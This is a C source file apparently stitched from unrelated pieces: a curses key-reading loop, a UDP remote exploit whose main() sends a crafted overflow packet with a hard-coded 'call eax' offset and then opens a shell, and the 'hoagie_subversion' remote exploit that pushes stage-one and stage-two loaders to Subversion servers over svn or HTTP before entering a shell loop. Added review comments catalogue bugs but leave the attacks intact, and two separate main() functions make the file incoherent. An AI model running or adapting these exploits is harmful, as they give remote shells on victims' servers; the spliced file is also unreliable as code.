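/*
 * Read keys from the curses window until 'q' is pressed.  Each key is looked
 * up in g_movetab; a matching entry either calls its handler (fct) or runs its
 * shell action (sh) against the currently focused menu, and the focused window
 * is redrawn afterwards.  TAB toggles the focus between the two menus and
 * recolours their backgrounds.
 *
 * The first pass through the loop deliberately runs without reading a key
 * (i == -1) so that the focused window is drawn before any input is waited for.
 *
 * Returns TRUE once 'q' terminates the loop.
 */
t_bool catch_key(void)
{
    int i = -1;
    /* Was uninitialised on the draw-only first pass: reading it was undefined
     * behaviour and could dispatch a random g_movetab entry.  0 makes the table
     * search below stop at the terminating entry (c == 0) instead. */
    int key = 0;

    keypad(stdscr, TRUE);
    while (i == -1 || (key = getch()) != 'q') {
        i = 0;
        if (key == '\t') {
            g_ctrl.focus = (g_ctrl.focus + 1) % 2;
            wbkgd(g_ctrl.menu[g_ctrl.focus].win, COLOR_PAIR(P_FONT));
            wbkgd(g_ctrl.menu[(g_ctrl.focus + 1) % 2].win, COLOR_PAIR(P_NFOC));
        }
        /* Relies on g_movetab being terminated by an entry whose c is 0. */
        while (g_movetab[i].c != 0 && g_movetab[i].c != key)
            i++;
        if (g_movetab[i].fct != NULL)
            g_movetab[i].fct(&(g_ctrl.menu[g_ctrl.focus]));
        else if (g_movetab[i].sh != NULL)
            exec_sh(g_movetab[i].sh, &(g_ctrl.menu[g_ctrl.focus]));
        refresh_win(g_ctrl.focus);
    }
    return (TRUE);
}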
/*
 * Entry point.  Sends two UDP datagrams (INFO, then GETCH) to <host>:<port>,
 * parses the second reply for a space-delimited token ("challenge"), then
 * sends a third datagram built from the BOF1 format string.  A missing reply
 * to that third datagram (timeout2() < 0) is reported as the server being
 * vulnerable and argv[1] is handed to connect_sh()/exec_sh() (defined
 * elsewhere); any reply is printed and reported as not vulnerable.
 *
 * Review notes (defects visible in this block, left unchanged):
 *  - argc is checked against 2 but argv[2] is read unconditionally: running
 *    with only <host> dereferences argv[2] == NULL.  The usage printf() also
 *    passes PORT as an extra argument that the format string never consumes.
 *  - buffrecv[err] = 0x00 writes one byte past the array whenever recvfrom()
 *    returns exactly BUFFSZ bytes.
 *  - strncpy(challenge, stri, 16) does not NUL-terminate when the token is
 *    16 bytes or longer, and challenge is then printed with %s.
 *  - Only bufflen < 0 is checked after snprintf(); truncation
 *    (bufflen >= sizeof buffsend) is not.
 *  - rlen is an int but recvfrom() expects a socklen_t *; buffrecv is
 *    unsigned char but strchr() takes char *.
 *  - `bug` is declared and never used.
 */
int main(int argc, char *argv[]) {
    unsigned char buffrecv[BUFFSZ], buffsend[sizeof(BOF1) + 64], challenge[16], bug, *bofstr, *stri, *strf;
    struct sockaddr_in peer;
    int sd, err, rlen, bufflen, proto;
    unsigned long offset;

    setbuf(stdout, NULL);
    /* Should be argc < 3: argv[2] is used below. */
    if(argc < 2) {
        printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT);
        exit(1);
    }
    printf("OK team, follow my command.\n");
    srand(time(NULL));
    bofstr=BOF1;
    peer.sin_addr.s_addr = resolv(argv[1]);
    /* atoi() gives no error indication; a non-numeric port silently becomes 0. */
    peer.sin_port = htons(atoi(argv[2]));
    // offset=strtoul(argv[3],NULL,16);
    peer.sin_family = AF_INET;
    rlen = sizeof(peer);
    /* Hard-coded; the argv[3] override above is disabled.  Printed with %08x
     * although offset is unsigned long (format/argument mismatch). */
    offset=0x0804AE93; // call eax
    printf("Using offset 0x%08x...\n",offset);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    /* GET INFORMATIONS */
    err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    /* Off-by-one when err == BUFFSZ. */
    buffrecv[err] = 0x00;
    proto = getproto(buffrecv);
    showinfostring(buffrecv, err);

    /* GET CHALLENGE NUMBER */
    err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    /* Off-by-one when err == BUFFSZ. */
    buffrecv[err] = 0x00;
    /* Token = bytes from the first space up to (not including) the second
     * space, or to the end of the reply if there is no second space. */
    stri = strchr(buffrecv, 0x20);
    if(!stri) stri = buffrecv;
    strf = strchr(stri + 1, 0x20);
    if(!strf) strf = buffrecv + err;
    *strf = 0x00;
    /* Not NUL-terminated if the token fills all 16 bytes; %s below then
     * reads past the array. */
    strncpy(challenge, stri, 16);
    printf("Challenge: %s\n", challenge);
    /* rand() << 1 overflows int when RAND_MAX is INT_MAX (glibc): UB. */
    bufflen = snprintf(buffsend, sizeof(BOF1) + 64, bofstr, proto, challenge,
        (long)(rand() << 1) + (rand() & 0xf), /* 31bit */
        (long)(rand() << 1) + (rand() & 0xf),
        (long)(rand() << 1) + (rand() & 0xf),
        (long)(rand() << 1) + (rand() & 0xf),
        offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
        offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
        offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF);
    /* snprintf() returns < 0 only on encoding error, not on truncation; the
     * message text ("cannot allocate") does not describe that condition. */
    if(bufflen < 0) {
        fputs("\nError: cannot allocate buffer in memory\n", stdout);
        exit(1);
    }
    printf("Sending deadly packet ... stand by\n");
    err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    /* Silence is interpreted as success; a server that simply drops the
     * datagram is indistinguishable from a crashed one here. */
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
        exec_sh(connect_sh(argv[1]));
        return(0);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    /* Off-by-one when err == BUFFSZ. */
    buffrecv[err] = 0x00;
    /* Assumes at least 5 bytes were received; not checked. */
    printf("Connect: %s\n", buffrecv + 5);
    close(sd);
    fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
    return(0);
}
/*
 * Entry point.  Parses argv[1] as a URL via parse_uri() (defined elsewhere),
 * resolves the host with gethostbyname(), connects over TCP, then runs one of
 * two protocol exchanges chosen by the parsed protocol:
 *  - SVN: reads the greeting, sends a "( 2 ( edit-pipeline ) ... )" line and
 *    an "( ANONYMOUS ( 0: ) )" line, then a "( get-dated-rev ... )" line
 *    carrying stage1loader plus the four bytes of addr.
 *  - HTTP: formats xmlreqfmt/requestfmt (defined elsewhere) around
 *    stage1loader and addr, writes it, sleeps one second, then writes
 *    stage2loader.
 * Finally the socket is handed to exec_sh().  argv[2] is parsed as a hex
 * address into addr.
 *
 * Review notes (defects visible in this block, left unchanged):
 *  - size is a size_t but read() returns ssize_t.  A failed read (-1) becomes
 *    SIZE_MAX and reply[size] = 0 writes far out of bounds; a full read
 *    (size == sizeof reply) writes one past the array.
 *  - memcpy(&sin.sin_addr.s_addr, he->h_addr, sizeof(he->h_addr)) copies
 *    sizeof(char *) bytes (8 on LP64), overflowing the 4-byte s_addr into the
 *    rest of sin; he->h_length is the intended size.
 *  - %d is used with strlen() results (size_t); port is an int passed to
 *    htons() without a range check.
 *  - write() return values are never checked; ptr is declared and unused.
 *  - strtoul(argv[2], NULL, 16) discards the end pointer, so malformed input
 *    is not detected.
 *  - The commented-out open("output", ...) block at the top is debug leftover.
 */
int main(int argc, char **argv) {
    int sock, port;
    size_t size;
    char cmd[1000], reply[1000], buffer[1000];
    char svdcmdline[1000];
    char host[1000], repos[1000], *ptr, *caddr;
    unsigned long addr;
    struct sockaddr_in sin;
    struct hostent *he;
    enum protocol proto;

    /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); write(sock,stage1loader,strlen(stage1loader)); close(sock); return 0;*/
    printf("hoagie_subversion - remote exploit against subversion servers\n"
           "by [email protected]\n\n");
    if(argc!=3) {
        printf("Usage: %s serverurl offset\n\n",argv[0]);
        printf("Examples:\n"
               " %s svn://localhost/repository 0x41414141\n"
               " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
        printf("The offset is an alphanumeric address (or UTF-8 to be\n"
               "more precise) of a pop instruction, followed by a ret.\n"
               "Brute force when in doubt.\n\n");
        printf("When exploiting against an svn://-url, you can supply a\n"
               "binary offset too.\n\n");
        exit(1);
    }

    // parse the URI
    /* svdcmdline keeps a copy of the raw URL; it is echoed back in the
     * edit-pipeline line below.  host/port/repos are filled by parse_uri(). */
    snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
    if(parse_uri(argv[1],&proto,host,&port,repos)<0) {
        printf("URI parse error\n");
        exit(1);
    }
    printf("parse_uri result:\n"
           "Protocol: %d\n"
           "Host: %s\n"
           "Port: %d\n"
           "Repository: %s\n\n",proto,host,port,repos);
    /* No endptr/errno check on the conversion. */
    addr=strtoul(argv[2],NULL,16);
    /* caddr views addr as raw bytes; the printed order (3,2,1,0) assumes a
     * little-endian, 32-bit-or-wider unsigned long. */
    caddr=(char *)&addr;
    printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);

    sock=socket(AF_INET,SOCK_STREAM,0);
    if(sock<0) {
        perror("socket");
        return -1;
    }
    he=gethostbyname(host);
    if(he==NULL) {
        herror("gethostbyname");
        return -1;
    }
    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    /* sizeof(he->h_addr) is the size of a pointer, not of the address. */
    memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
    if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) {
        perror("connect");
        return -1;
    }

    if(proto==SVN) {
        /* Each read() result is used as an index without checking for -1
         * or for a full buffer (see review notes above). */
        size=read(sock,reply,sizeof(reply));
        reply[size]=0;
        printf("Server said: %s\n",reply);
        snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
        write(sock,cmd,strlen(cmd));
        size=read(sock,reply,sizeof(reply));
        reply[size]=0;
        printf("Server said: %s\n",reply);
        strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
        write(sock,cmd,strlen(cmd));
        size=read(sock,reply,sizeof(reply));
        reply[size]=0;
        printf("Server said: %s\n",reply);
        snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, caddr[0],caddr[1],caddr[2],caddr[3]);
        write(sock,cmd,strlen(cmd));
        size=read(sock,reply,sizeof(reply));
        reply[size]=0;
        printf("Server said: %s\n",reply);
    } else if(proto==HTTP) {
        // preparing the request...
        /* Neither snprintf() result is checked for truncation against the
         * 1000-byte buffers. */
        snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, caddr[0],caddr[1],caddr[2],caddr[3]);
        size=strlen(buffer);
        snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
        // now sending the request, immediately followed by the 2nd stage loader
        printf("Sending:\n%s",cmd);
        write(sock,cmd,strlen(cmd));
        sleep(1);
        write(sock,stage2loader,stage2loaderlen);
    }
    /* Any other protocol value falls through to the shell loop with nothing
     * having been sent. */

    // SHELL LOOP
    printf("Entering shell loop...\n");
    exec_sh(sock);
    /*sleep(1); close(sock); printf("\nConnecting to the shell...\n"); exec_sh(connect_sh()); */
    return 0;
}